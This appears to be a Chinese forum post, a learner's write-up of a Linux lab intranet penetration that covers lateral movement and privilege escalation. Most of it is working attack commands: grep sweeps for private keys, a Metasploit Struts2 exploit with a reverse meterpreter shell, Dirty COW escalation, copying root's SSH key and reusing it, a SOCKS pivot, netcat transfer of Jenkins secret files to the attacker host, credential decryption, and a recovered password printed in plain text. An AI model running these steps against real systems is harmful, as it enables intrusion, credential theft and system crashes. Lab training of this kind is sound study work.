第137天:横向移动-Linux_ssh工具杂项&Linux靶场环境搭建 ...

打印 上一主题 下一主题

主题 550|帖子 550|积分 1650

实验环境及图解:
   通过网盘分享的文件:137-Linux内网环境镜像文件
链接: https://pan.baidu.com/s/1W_5DvhbkGYMqML4mi1rjQA?pwd=ad6r 提取码: ad6r
  

一般情况下SSH密钥存放在~/.ssh/目录下,也可以文件中搜刮已保存的SSH凭据
   ~/.ssh/config
~/.ssh/known_hosts
~/.bash_history 
  文件中搜刮已经保存的ssh
  1. grep -ir "BEGIN RSA PRIVATE KEY" /*
  2. grep -ir "BEGIN DSA PRIVATE KEY" /*
  3. grep -ir "BEGIN OPENSSH PRIVATE KEY" /*
复制代码
nmap信息收集ip以及开放端口

别的两台主机做了限制,没办法访问
80端口页面

8080端口页面

80页面中有版本,opencms 10.5.3只有一个xxe漏洞

下面另有一个页面有漏洞/struts2-showcase/show-action,但是我也不知道这是怎么来的目录扫描也扫不到(没这个字典)


msf使用strust工具
   use exploit/multi/http/struts2_content_type_ognl
set payload linux/x64/meterpreter/reverse_tcp
set rhosts 172.16.250.10
set lhost 172.16.250.128
set rport 80
run
  

检察目前得到的权限

上传les.sh文件GitHub - rebootuser/LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks
加执行权限,执行

扫描出来脏牛漏洞

这里使用dirty漏洞进行提权,这篇文章复现过一次
第103天: 权限提升-Linux 系统&辅助项目&脏牛&Dirty&内核漏洞&SUID&GUID_103-linux提升-内核&suid&辅助&环境&exp等-CSDN博客
下载这个c文件到本地

编译,并且加权限执行
   gcc -Wall -o dirtycow-mem dirtycow-mem.c -ldl -lpthread  #编译
python3 -c "import pty;pty.spawn('/bin/bash')"  #开启python子bash,脏牛漏洞得使用该bash去反弹shell
chmod +x ./dirtycow-mem
./dirtycow-mem
  


这个执行完成后要包管系统稳定,需要执行下面的两条命令,速度要快,不然系统会崩溃,以是就是该漏洞要谨慎去使用
  1. echo 0 > /proc/sys/vm/dirty_writeback_centisecs
  2. echo 1 > /proc/sys/kernel/panic && echo 1 > /proc/sys/kernel/panic_on_oops && echo 1 > /proc/sys/kernel/panic_on_unrecovered_nmi && echo 1 > /proc/sys/kernel/panic_on_io_nmi && echo 1 > /proc/sys/kernel/panic_on_warn
复制代码

确保稳定性

检察数据库设置文件,发现这里是站库分离
  1. cat /opt/tomcat/webapps/kittens/WEB-INF/config/opencms.properties
复制代码

检察历史,发现使用了这个rsa去连接过30的root用户,以是要把这个文件保存在本地root目录下

 把id_rsa复制到本地,使用
   cp /root/.ssh/id_rsa /tmp/id_rsa
chmod 777 id_rsa                               #需要赋予权限才可以下载
download  /tmp/id_rsa /root/id_rsa
chmod 777 id_rsa                            #恢复原来的权限,否则需要输入root密码
ssh -i id_rsa root@172.16.250.30
  
 复制到本地

这里这个文件需要复制到本地root用户目录下去执行,因为我本来登录的时候是kali,以是只能复制到tmp下然后移动到/root目录下
 信息收集

检察端口

正常访问是访问不了的,通过第一张图片了解到8080端口需要通过10主机去访问,设置sockets代理去访问

起首需要添加路由

设置代理
  1. use auxiliary/server/socks_proxy
  2. set version 5
  3. run
复制代码


这里有个扩充知识点
   

注意这里:
dynamic_chain:下方代理节点有一条测试精确也可以使用
strict_chain:如果下方设置了多个节点,必须都测试精确才可以使用
  先测试可以或许访问
欣赏器要访问的话需要设置代理

tomcat9.0.7版本相对安全
 
/jenkins页面
内里有一个根据页面

使用nc把jenkins的相关密码文件传送过来,因为这里是30只让10访问,以是只能反向传输
   kali
nc -lvp 1234 > master.key
nc -lvp 1234 > hudson.util.Secret
nc -lvp 1234 > credentials.xml
30主机
nc 172.16.250.128 1234 < /home/jenkins/secrets/master.key
nc 172.16.250.128 1234 < /home/jenkins/secrets/hudson.util.Secret
nc 172.16.250.128 1234 < /home/jenkins/credentials.xml
  

其他两个文件也是同样的方式传输
使用python脚本破解,这里python不能使用太高的版本
GitHub - cheetz/jenkins-decrypt: Credentials dumper for Jenkins
  1. python decrypt.py master.key hudson.util.Secret credentials.xml
复制代码

密码为: )uDvra{4UL^;r?*h
连接

这里其实我照旧不太理解不是别的IP不让访问ssh嘛,为啥可以直接连接

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

用多少眼泪才能让你相信

金牌会员
这个人很懒什么都没写!

标签云

快速回复 返回顶部 返回列表